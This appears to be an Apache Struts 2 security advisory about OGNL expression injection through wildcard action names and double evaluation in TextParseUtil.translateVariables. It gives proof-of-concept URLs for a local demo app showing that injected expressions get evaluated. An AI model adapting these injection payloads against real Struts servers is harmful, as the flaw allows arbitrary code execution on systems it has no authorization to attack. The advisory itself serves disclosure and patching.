Page History

Summary

Problem

Struts 2 allows define action mapping base on wildcards, like in example below:

...

If a request doesn't match any other defined action, it will be matched by * and requested action name will be used to load JSP file base on the name of action. And as value of {1} is threaten as an OGNL expression, thus allow to execute arbitrary Java code on server side. This vulnerability is combination of two problems:

• requested action name isn't escaped or checked agains whitelist
• double evaluation of an OGNL expression in TextParseUtil.translateVariables when combination of $ and % open chars is used.

Proof of concept

Wildcard matching

1. Run struts2-blank app

2. Open the following url, resulting in dynamic action name resolution based on passed value of #foo

   Code Block
   http://localhost:8080/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D

   
   

   Code Block
   http://localhost:8080/example/${#foo='Menu',#foo}

   
   

...

Double evaluation of an expression

1. Open example.xml present in the Struts Blank App and change result of HelloWorld action to one below:

   Code Block
   xml xml
   <result type="httpheader"> <param name="headers.foobar">${message}</param> </result>

   
   

2. Open HelloWorld.java and change execute() method as below:

   Code Block
   java java
   public String execute() throws Exception { return SUCCESS; }

   
   

3. Run struts2-blank app

4. Open the following url (you must have a tool to check response headers)

   Code Block
   http://localhost:8080/example/HelloWorld.action?message=%24{%25{1%2B2}}

   
   

   Code Block
   http://localhost:8080/example/HelloWorld.action?message=${%{1+2}}

   
   

5. Check value of foobar header, it should be 3

...